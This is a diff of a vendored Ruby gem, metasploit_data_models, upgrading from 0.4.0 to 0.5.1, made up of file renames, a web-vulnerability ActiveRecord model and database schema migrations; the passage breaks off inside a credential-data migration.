lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb new file mode 100755 index 0000000000..4577818842 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb @@ -0,0 +1,144 @@ +# A Web Vulnerability found during a web scan or web audit. +# +# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that +# your patches are reloaded on each request in development mode for your Rails application. +# +# @example extending Mdm::WebVuln +# # config/initializers/mdm_web_vuln.rb +# ActiveSupport.on_load(:mdm_web_vuln) do +# def confidence_percentage +# "#{confidence}%" +# end +# end +class Mdm::WebVuln < ActiveRecord::Base + # + # CONSTANTS + # + + # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there + # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. + CONFIDENCE_RANGE = 1 .. 100 + + # Allowed {#method methods}. + METHODS = [ + 'GET', + # XXX I don't know why PATH is a valid method when it's not an HTTP Method/Verb + 'PATH', + 'POST' + ] + + # {#risk Risk} is rated on a scale from 0 (least risky) to 5 (most risky). + RISK_RANGE = 0 .. 5 + + # + # Associations + # + + belongs_to :web_site, :class_name => 'Mdm::WebSite' + + # + # Attributes + # + + # @!attribute [rw] blame + # Who to blame for the vulnerability + # + # @return [String] + + # @!attribute [rw] category + # Category of this vulnerability. + # + # @return [String] + + # @!attribute [rw] confidence + # Percentage confidence scanner or auditor has that this vulnerability is not a false positive + # + # @return [Integer] 1% to 100% + + # @!attribute [rw] description + # Description of the vulnerability + # + # @return [String, nil] + + # @!attribute [rw] method + # HTTP Methods for request that found vulnerability. 'PATH' is also allowed even though it is not an HTTP Method. + # + # @return [String] + # @see METHODS + + # @!attribute [rw] name + # Name of the vulnerability + # + # @return [String] + + # @!attribute [rw] path + # Path portion of URL + # + # @return [String] + + # @!attribute [rw] payload + # Web audit payload that gets executed by the remote server. Used for code injection vulnerabilities. + # + # @return [String, nil] + + # @!attribute [rw] pname + # Name of parameter that demonstrates vulnerability + # + # @return [String] + + # @!attribute [rw] proof + # String that proves vulnerability, such as a code snippet, etc. + # + # @return [String] + + # @!attribute [rw] query + # The GET query. + # + # @return [String] + + # @!attribute [rw] request + # + # @return [String] + + # @!attribute [rw] risk + # {RISK_RANGE Risk} of leaving this vulnerability unpatched. + # + # @return [Integer] + + # + # Validations + # + + validates :category, :presence => true + validates :confidence, + :inclusion => { + :in => CONFIDENCE_RANGE + } + validates :method, + :inclusion => { + :in => METHODS + } + validates :name, :presence => true + validates :path, :presence => true + validates :params, :presence => true + validates :pname, :presence => true + validates :proof, :presence => true + validates :risk, + :inclusion => { + :in => RISK_RANGE + } + validates :web_site, :presence => true + + # + # Serializations + # + + # @!attribute [rw] params + # Parameters sent as part of request + # + # @return [Array>] Array of parameter key value pairs + serialize :params, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_web_vuln, self) +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb new file mode 100755 index 0000000000..efda742476 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb @@ -0,0 +1,79 @@ +class CreateTables < ActiveRecord::Migration + + def self.up + + create_table :hosts do |t| + t.timestamp :created + t.string :address, :limit => 16 # unique + t.string :address6 + t.string :mac + t.string :comm + t.string :name + t.string :state + t.string :info, :limit => 1024 + t.string :os_name + t.string :os_flavor + t.string :os_sp + t.string :os_lang + t.string :arch + end + + add_index :hosts, :address, :unique => true + + create_table :clients do |t| + t.integer :host_id + t.timestamp :created + t.string :ua_string, :limit => 1024, :null => false + t.string :ua_name, :limit => 64 + t.string :ua_ver, :limit => 32 + end + + create_table :services do |t| + t.integer :host_id + t.timestamp :created + t.integer :port, :null => false + t.string :proto, :limit => 16, :null => false + t.string :state + t.string :name + t.string :info, :limit => 1024 + end + + create_table :vulns do |t| + t.integer :host_id + t.integer :service_id + t.timestamp :created + t.string :name + t.text :data + end + + create_table :refs do |t| + t.integer :ref_id + t.timestamp :created + t.string :name, :limit => 512 + end + + create_table :vulns_refs, :id => false do |t| + t.integer :ref_id + t.integer :vuln_id + end + + create_table :notes do |t| + t.integer :host_id + t.timestamp :created + t.string :ntype, :limit => 512 + t.text :data + end + + end + + def self.down + drop_table :hosts + drop_table :clients + drop_table :services + drop_table :vulns + drop_table :refs + drop_table :vulns_refs + drop_table :notes + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb new file mode 100755 index 0000000000..e0d37098c2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb @@ -0,0 +1,35 @@ +class AddWmapTables < ActiveRecord::Migration + def self.up + create_table :wmap_targets do |t| + t.string :host # vhost + t.string :address, :limit => 16 # unique + t.string :address6 + t.integer :port + t.integer :ssl + t.integer :selected + end + + create_table :wmap_requests do |t| + t.string :host # vhost + t.string :address, :limit => 16 # unique + t.string :address6 + t.integer :port + t.integer :ssl + t.string :meth, :limit => 32 + t.text :path + t.text :headers + t.text :query + t.text :body + t.string :respcode, :limit => 16 + t.text :resphead + t.text :response + t.timestamp :created + end + end + + def self.down + drop_table :wmap_targets + drop_table :wmap_requests + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb new file mode 100755 index 0000000000..9afe792ef5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb @@ -0,0 +1,36 @@ +class AddWorkspaces < ActiveRecord::Migration + + def self.up + create_table :workspaces do |t| + t.string :name + t.timestamps + end + + change_table :hosts do |t| + t.integer :workspace_id, :required => true + end + + remove_index :hosts, :column => :address + + # + # This was broken after 018_add_workspace_user_info was introduced + # because of the new boundary column. For some reason, the + # find_or_create_by_name that .default eventually calls here tries to + # create a record with the boundary field that doesn't exist yet. + # See #1724 + # + #w = Msf::DBManager::Workspace.default + #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] + end + + def self.down + drop_table :workspaces + + change_table :hosts do |t| + t.remove :workspace_id + end + + add_index :hosts, :address, :unique => true + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb new file mode 100755 index 0000000000..3aedba8e20 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb @@ -0,0 +1,20 @@ +class MoveNotes < ActiveRecord::Migration + def self.up + # Remove the host requirement. We'll add the column back in below. + remove_column :notes, :host_id + change_table :notes do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.integer :service_id + t.integer :host_id + end + end + + def self.down + remove_column :notes, :workspace_id + remove_column :notes, :service_id + change_table :notes do |t| + t.integer :host_id, :null => false + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb new file mode 100755 index 0000000000..a89d75281e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb @@ -0,0 +1,16 @@ +class AddEventsTable < ActiveRecord::Migration + def self.up + create_table :events do |t| + t.integer :workspace_id + t.integer :host_id + t.timestamp :created_at + t.string :user + t.string :name + t.string :info + end + end + def self.down + drop_table :events + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb new file mode 100755 index 0000000000..bd34021e11 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb @@ -0,0 +1,58 @@ +class ExpandInfo < ActiveRecord::Migration + def self.up + remove_column :events, :info + change_table :events do |t| + t.string :info, :limit => 4096 + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 4096 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 4096 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 4096 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 4096 + end + end + + def self.down + + remove_column :events, :info + change_table :events do |t| + t.string :info + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 1024 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 1024 + end + + remove_column :vulns, :data + change_table :hosts do |t| + t.string :data, :limit => 1024 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 1024 + end + + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb new file mode 100755 index 0000000000..446a83aa29 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb @@ -0,0 +1,26 @@ + +# Adds 'created_at' and 'updated_at' columns to every primary table. +# +class AddTimestamps < ActiveRecord::Migration + + @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] + @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] + @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] + + def self.up + @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } + + @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } + + @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } + end + + def self.down + @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } + + @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } + + @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb new file mode 100755 index 0000000000..32786f8cfb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb @@ -0,0 +1,20 @@ +class AddLoots < ActiveRecord::Migration + + def self.up + create_table :loots do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.integer :host_id + t.integer :service_id + t.string :ltype, :limit => 512 + t.string :path, :limit => 1024 + t.text :data + t.timestamps + end + end + + def self.down + drop_table :loots + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb new file mode 100755 index 0000000000..4cc32cc6e4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb @@ -0,0 +1,16 @@ +class CreateUsers < ActiveRecord::Migration + def self.up + create_table :users do |t| + t.string :username + t.string :crypted_password + t.string :password_salt + t.string :persistence_token + + t.timestamps + end + end + + def self.down + drop_table :users + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb new file mode 100755 index 0000000000..0aad1366fb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb @@ -0,0 +1,10 @@ +class AddLootsCtype < ActiveRecord::Migration + def self.up + add_column :loots, :content_type, :string + end + + def self.down + remove_column :loots, :content_type + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb new file mode 100755 index 0000000000..f99dd68d32 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb @@ -0,0 +1,16 @@ +class AddAlertFields < ActiveRecord::Migration + def self.up + add_column :notes, :critical, :boolean + add_column :notes, :seen, :boolean + add_column :events, :critical, :boolean + add_column :events, :seen, :boolean + end + + def self.down + remove_column :notes, :critical + remove_column :notes, :seen + remove_column :events, :critical + remove_column :events, :seen + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb new file mode 100755 index 0000000000..2f16e8b70d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb @@ -0,0 +1,19 @@ +class AddReports < ActiveRecord::Migration + + def self.up + create_table :reports do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :rtype + t.string :path, :limit => 1024 + t.text :options + t.timestamps + end + end + + def self.down + drop_table :reports + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb new file mode 100755 index 0000000000..39004c821e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb @@ -0,0 +1,24 @@ +class AddTasks < ActiveRecord::Migration + + def self.up + create_table :tasks do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :module + t.datetime :completed_at + t.string :path, :limit => 1024 + t.string :info + t.string :description + t.integer :progress + t.text :options + t.text :error + t.timestamps + end + end + + def self.down + drop_table :tasks + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb new file mode 100755 index 0000000000..bf01c7afb8 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb @@ -0,0 +1,10 @@ +class AddTasksResult < ActiveRecord::Migration + def self.up + add_column :tasks, :result, :text + end + + def self.down + remove_column :tasks, :result + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb new file mode 100755 index 0000000000..616d8c96be --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb @@ -0,0 +1,12 @@ +class AddLootsFields < ActiveRecord::Migration + def self.up + add_column :loots, :name, :text + add_column :loots, :info, :text + end + + def self.down + remove_column :loots, :name + remove_column :loots, :info + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb new file mode 100755 index 0000000000..7934a0f423 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb @@ -0,0 +1,16 @@ +class RenameUser < ActiveRecord::Migration + def self.up + remove_column :events, :user + change_table :events do |t| + t.string :username + end + end + + def self.down + remove_column :events, :username + change_table :events do |t| + t.string :user + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb new file mode 100755 index 0000000000..1e2827801e --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb @@ -0,0 +1,10 @@ +class AddHostPurpose < ActiveRecord::Migration + def self.up + add_column :hosts, :purpose, :text + end + + def self.down + remove_column :hosts, :purpose + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb new file mode 100755 index 0000000000..cee6fd8d3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb @@ -0,0 +1,58 @@ +class ExpandInfo2 < ActiveRecord::Migration + def self.up + remove_column :events, :info + change_table :events do |t| + t.string :info, :limit => 65536 + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 65536 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 65536 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 65536 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 65536 + end + end + + def self.down + + remove_column :events, :info + change_table :events do |t| + t.string :info + end + + remove_column :notes, :data + change_table :notes do |t| + t.string :data, :limit => 4096 + end + + remove_column :hosts, :info + change_table :hosts do |t| + t.string :info, :limit => 4096 + end + + remove_column :vulns, :data + change_table :vulns do |t| + t.string :data, :limit => 4096 + end + + remove_column :services, :info + change_table :services do |t| + t.string :info, :limit => 4096 + end + + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb new file mode 100755 index 0000000000..fb5e101fc3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb @@ -0,0 +1,29 @@ +class AddWorkspaceUserInfo < ActiveRecord::Migration + def self.up + change_table :workspaces do |t| + t.string :boundary, :limit => 4096 + end + + change_table :users do |t| + t.string :fullname + t.string :email + t.string :phone + t.string :company + end + end + + def self.down + change_table :workspaces do |t| + t.remove :boundary + end + + change_table :users do |t| + t.remove :fullname + t.remove :email + t.remove :phone + t.remove :company + end + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb new file mode 100755 index 0000000000..0dc31f0c61 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb @@ -0,0 +1,23 @@ +class AddWorkspaceDesc < ActiveRecord::Migration + def self.up + change_table :workspaces do |t| + t.string :description, :limit => 4096 + end + + change_table :hosts do |t| + t.string :comments, :limit => 4096 + end + end + + def self.down + change_table :workspaces do |t| + t.remove :description + end + + change_table :hosts do |t| + t.remove :comments + end + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb new file mode 100755 index 0000000000..40b472701c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb @@ -0,0 +1,11 @@ +class AddUserPreferences < ActiveRecord::Migration + def self.up + add_column :users, :prefs, :string, :limit => 524288 + end + + def self.down + remove_column :users, :prefs + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb new file mode 100755 index 0000000000..bb9a2bccd6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb @@ -0,0 +1,18 @@ +class StandardizeInfoAndData < ActiveRecord::Migration + def self.up + # Remove the host requirement. We'll add the column back in below. + remove_column :vulns, :data + change_table :vulns do |t| + t.string :info, :limit => 65536 + end + end + + def self.down + remove_column :vulns, :info + change_table :notes do |t| + t.string :data, :limit => 65536 + + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb new file mode 100755 index 0000000000..fec9698c06 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb @@ -0,0 +1,10 @@ +class EnlargeEventInfo < ActiveRecord::Migration + def self.up + change_column :events, :info, :text + end + + def self.down + change_column :events, :info, :string, :limit => 65535 + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb new file mode 100755 index 0000000000..7ec5716e82 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb @@ -0,0 +1,10 @@ +class AddReportDownloadedAt < ActiveRecord::Migration + def self.up + add_column :reports, :downloaded_at, :timestamp + end + + def self.down + remove_column :reports, :downloaded_at + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb new file mode 100755 index 0000000000..14f0a96222 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb @@ -0,0 +1,12 @@ +class ConvertServiceInfoToText < ActiveRecord::Migration + + def self.up + change_column :services, :info, :text + end + + def self.down + change_column :services, :info, :string, :limit => 65536 + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb new file mode 100755 index 0000000000..d077dbd633 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb @@ -0,0 +1,19 @@ +class AddUserAdmin < ActiveRecord::Migration + + # Add user admin flag and project member list. + def self.up + add_column :users, :admin, :boolean, :default => true + + create_table :project_members, :id => false do |t| + t.integer :workspace_id, :null => false + t.integer :user_id, :null => false + end + end + + def self.down + remove_column :users, :admin + + drop_table :project_members + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb new file mode 100755 index 0000000000..381ec8373a --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb @@ -0,0 +1,19 @@ +class AddCredsTable < ActiveRecord::Migration + def self.up + create_table :creds do |t| + t.integer :service_id, :null => false + t.timestamps + t.string :user, :limit => 2048 + t.string :pass, :limit => 4096 + t.boolean :active, :default => true + t.string :proof, :limit => 4096 + t.string :ptype, :limit => 16 + t.integer :source_id + t.string :source_type + end + end + def self.down + drop_table :creds + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb new file mode 100755 index 0000000000..d752c270f4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb @@ -0,0 +1,154 @@ +class MigrateCredData < ActiveRecord::Migration + + def self.up + begin # Wrap the whole thing in a giant rescue. + skipped_notes = [] + new_creds = [] + Mdm::Note.find(:all).each do |note| + next unless note.ntype[/^auth\.(.*)/] + service_name = $1 + if !service_name + skipped_notes << note + next + end + if note.host and note.host.respond_to?(:address) + if note.service + svc_id = note.service.id + else + candidate_services = [] + note.host.services.each do |service| + if service.name == service_name + candidate_services << service + end + end + # Use the default port, or the first port that matches the protocol name. + default_port = case service_name.downcase + when 